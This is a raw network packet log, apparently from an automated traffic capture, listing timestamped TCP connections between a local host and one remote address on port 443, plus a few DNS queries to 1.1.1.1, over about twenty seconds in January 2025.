                        Jan 16, 2025 06:02:09.384282112 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.384649038 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.384690046 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.384716034 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.384723902 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.384744883 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.384766102 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385035038 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385078907 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385102034 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385109901 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385138988 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385148048 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385504961 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385550976 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385569096 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.385584116 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.385637045 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436028957 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.436079025 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.436094046 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436108112 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.436124086 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436259985 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436707020 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.436750889 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.436773062 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436780930 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.436849117 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.436849117 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.437150955 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.437191010 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.437227964 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.437237024 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.437248945 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.437273979 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.472557068 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.472625017 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.472632885 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.472660065 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.472681046 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.472697973 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.473128080 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.473179102 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.473205090 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.473212957 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.473238945 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.473252058 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.473706007 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.473753929 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.473777056 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.473783970 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.473810911 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.473834038 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.474358082 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.474401951 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.474419117 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.474427938 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.474448919 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.474467993 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.474880934 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.474931002 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.474972010 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.474978924 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.474994898 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.475012064 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.524946928 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.525003910 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.525019884 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.525029898 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.525059938 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.525082111 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.525222063 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.525265932 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.525285006 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.525293112 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.525326014 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.525337934 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.525753975 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.525824070 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.525826931 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.525840044 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.525871038 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.525882006 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.525937080 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.526068926 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.739931107 CET4434974694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.740005970 CET49746443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.740020990 CET4434974694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.740036964 CET4434974694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.740087032 CET49746443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.743029118 CET49746443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.743041039 CET4434974694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.888307095 CET49754443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.888406038 CET4434975494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:09.888480902 CET49754443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.888878107 CET49754443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:09.888916016 CET4434975494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:10.569906950 CET49733443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:10.569932938 CET4434973394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:10.592480898 CET4434975494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:10.592675924 CET49754443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:10.593014956 CET49754443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:10.593044043 CET4434975494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:10.593453884 CET49754443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:10.593466997 CET4434975494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:11.073256016 CET4434975494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:11.073354959 CET4434975494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:11.073525906 CET49754443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:11.076474905 CET49754443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:11.076514959 CET4434975494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:11.218497992 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:11.218554974 CET4434976794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:11.218745947 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:11.219016075 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:11.219036102 CET4434976794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:11.926290989 CET4434976794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:11.926376104 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:11.926934004 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:11.926970959 CET4434976794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:11.927203894 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:11.927215099 CET4434976794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:12.382744074 CET4434976794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:12.382829905 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:12.382864952 CET4434976794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:12.382883072 CET4434976794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:12.382921934 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:12.382947922 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:12.385864973 CET49767443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:12.385885000 CET4434976794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:12.540600061 CET49777443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:12.540647030 CET4434977794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:12.540757895 CET49777443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:12.541137934 CET49777443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:12.541157007 CET4434977794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:13.274003983 CET4434977794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:13.274085045 CET49777443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:13.274540901 CET49777443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:13.274564981 CET4434977794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:13.274768114 CET49777443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:13.274780989 CET4434977794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:13.748328924 CET4434977794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:13.748433113 CET4434977794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:13.748459101 CET49777443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:13.748496056 CET49777443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:13.751396894 CET49777443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:13.751421928 CET4434977794.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:13.889029026 CET49784443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:13.889081955 CET4434978494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:13.889168024 CET49784443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:13.889415026 CET49784443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:13.889430046 CET4434978494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:14.615011930 CET4434978494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:14.615144968 CET49784443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:14.619010925 CET49784443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:14.619030952 CET4434978494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:14.626286030 CET49784443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:14.626297951 CET4434978494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:15.066693068 CET4434978494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:15.066776037 CET49784443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:15.066780090 CET4434978494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:15.066868067 CET49784443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:15.069777012 CET49784443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:15.069827080 CET4434978494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:15.216646910 CET49794443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:15.216706038 CET4434979494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:15.216779947 CET49794443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:15.217065096 CET49794443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:15.217080116 CET4434979494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:15.646358967 CET6083453192.168.2.61.1.1.1
                        Jan 16, 2025 06:02:15.651387930 CET53608341.1.1.1192.168.2.6
                        Jan 16, 2025 06:02:15.651475906 CET6083453192.168.2.61.1.1.1
                        Jan 16, 2025 06:02:15.656338930 CET53608341.1.1.1192.168.2.6
                        Jan 16, 2025 06:02:15.931669950 CET4434979494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:15.931751966 CET49794443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:15.932245016 CET49794443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:15.932272911 CET4434979494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:15.932431936 CET49794443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:15.932444096 CET4434979494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:16.106513023 CET6083453192.168.2.61.1.1.1
                        Jan 16, 2025 06:02:16.111553907 CET53608341.1.1.1192.168.2.6
                        Jan 16, 2025 06:02:16.111629009 CET6083453192.168.2.61.1.1.1
                        Jan 16, 2025 06:02:16.397460938 CET4434979494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:16.397540092 CET4434979494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:16.397545099 CET49794443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:16.397609949 CET49794443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:16.400005102 CET49794443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:16.400044918 CET4434979494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:16.542730093 CET60839443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:16.542757988 CET4436083994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:16.542829990 CET60839443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:16.543062925 CET60839443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:16.543076038 CET4436083994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:17.248492002 CET4436083994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:17.248614073 CET60839443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:17.248972893 CET60839443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:17.248977900 CET4436083994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:17.249164104 CET60839443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:17.249167919 CET4436083994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:17.737188101 CET4436083994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:17.737262964 CET60839443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:17.737270117 CET4436083994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:17.737497091 CET60839443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:17.740535021 CET60839443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:17.740554094 CET4436083994.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:17.886300087 CET60848443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:17.886341095 CET4436084894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:17.886544943 CET60848443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:17.886835098 CET60848443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:17.886852980 CET4436084894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:18.621396065 CET4436084894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:18.621565104 CET60848443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:18.621881962 CET60848443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:18.621889114 CET4436084894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:18.622068882 CET60848443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:18.622076035 CET4436084894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:19.103653908 CET4436084894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:19.103725910 CET4436084894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:19.103841066 CET60848443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:19.106558084 CET60848443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:19.106575012 CET4436084894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:19.245311022 CET60854443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:19.245362997 CET4436085494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:19.245438099 CET60854443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:19.245640039 CET60854443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:19.245657921 CET4436085494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:19.986583948 CET4436085494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:19.986705065 CET60854443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:19.987339973 CET60854443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:19.987344980 CET4436085494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:19.987546921 CET60854443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:19.987550020 CET4436085494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:20.462758064 CET4436085494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:20.462821960 CET4436085494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:20.462842941 CET60854443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:20.462904930 CET60854443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:20.467227936 CET60854443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:20.467262983 CET4436085494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:20.604939938 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:20.605048895 CET4436086494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:20.605236053 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:20.605372906 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:20.605396032 CET4436086494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:21.346093893 CET4436086494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:21.346175909 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.346589088 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.346611023 CET4436086494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:21.346780062 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.346792936 CET4436086494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:21.827850103 CET4436086494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:21.827941895 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.827971935 CET4436086494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:21.828030109 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.828031063 CET4436086494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:21.828088999 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.836532116 CET60864443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.836555004 CET4436086494.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:21.982316017 CET60873443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.982398987 CET4436087394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:21.982491016 CET60873443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.982774973 CET60873443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:21.982810974 CET4436087394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:22.682001114 CET4436087394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:22.682193041 CET60873443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:22.682473898 CET60873443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:22.682488918 CET4436087394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:22.682786942 CET60873443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:22.682799101 CET4436087394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:23.130951881 CET4436087394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:23.131038904 CET4436087394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:23.131068945 CET60873443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:23.131095886 CET60873443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:23.133640051 CET60873443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:23.133661032 CET4436087394.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:23.279011011 CET60880443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:23.279110909 CET4436088094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:23.279357910 CET60880443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:23.279661894 CET60880443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:23.279696941 CET4436088094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:24.003915071 CET4436088094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:24.004004002 CET60880443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:24.004587889 CET60880443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:24.004599094 CET4436088094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:24.006424904 CET60880443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:24.006438017 CET4436088094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:24.476764917 CET4436088094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:24.476839066 CET4436088094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:24.476993084 CET60880443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:24.477073908 CET60880443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:24.480134964 CET60880443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:24.480170965 CET4436088094.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:24.629970074 CET60888443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:24.630011082 CET4436088894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:24.630125046 CET60888443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:24.630568981 CET60888443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:24.630582094 CET4436088894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:25.354182005 CET4436088894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:25.354295969 CET60888443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:25.354969978 CET60888443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:25.354979038 CET4436088894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:25.355179071 CET60888443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:25.355184078 CET4436088894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:25.806304932 CET4436088894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:25.806370020 CET4436088894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:25.806598902 CET60888443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:25.809225082 CET60888443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:25.809240103 CET4436088894.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:25.952552080 CET60896443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:25.952672958 CET4436089694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:25.952853918 CET60896443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:25.953083038 CET60896443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:25.953124046 CET4436089694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:26.653597116 CET4436089694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:26.653754950 CET60896443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:26.654285908 CET60896443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:26.654314041 CET4436089694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:26.654509068 CET60896443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:26.654521942 CET4436089694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:27.100594044 CET4436089694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:27.100652933 CET4436089694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:27.100677013 CET60896443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:27.100712061 CET60896443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:27.103526115 CET60896443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:27.103549957 CET4436089694.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:27.255194902 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:27.255230904 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:27.255368948 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:27.255847931 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:27.255872011 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:27.964751959 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:27.964829922 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:27.965378046 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:27.965389967 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:27.965626001 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:27.965636969 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:28.415860891 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:28.415939093 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:28.415958881 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:28.416014910 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:28.416141033 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:28.416187048 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:28.416192055 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:28.416234016 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:28.419367075 CET60905443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:28.419390917 CET4436090594.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:28.567634106 CET60911443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:28.567665100 CET4436091194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:28.567749023 CET60911443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:28.568011045 CET60911443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:28.568025112 CET4436091194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:29.277266979 CET4436091194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:29.277380943 CET60911443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:29.301528931 CET60911443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:29.301589966 CET4436091194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:29.301773071 CET60911443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:29.301788092 CET4436091194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:29.742527008 CET4436091194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:29.742731094 CET4436091194.159.113.213192.168.2.6
                        Jan 16, 2025 06:02:29.742958069 CET60911443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:29.774995089 CET60911443192.168.2.694.159.113.213
                        Jan 16, 2025 06:02:29.775067091 CET4436091194.159.113.213192.168.2.6
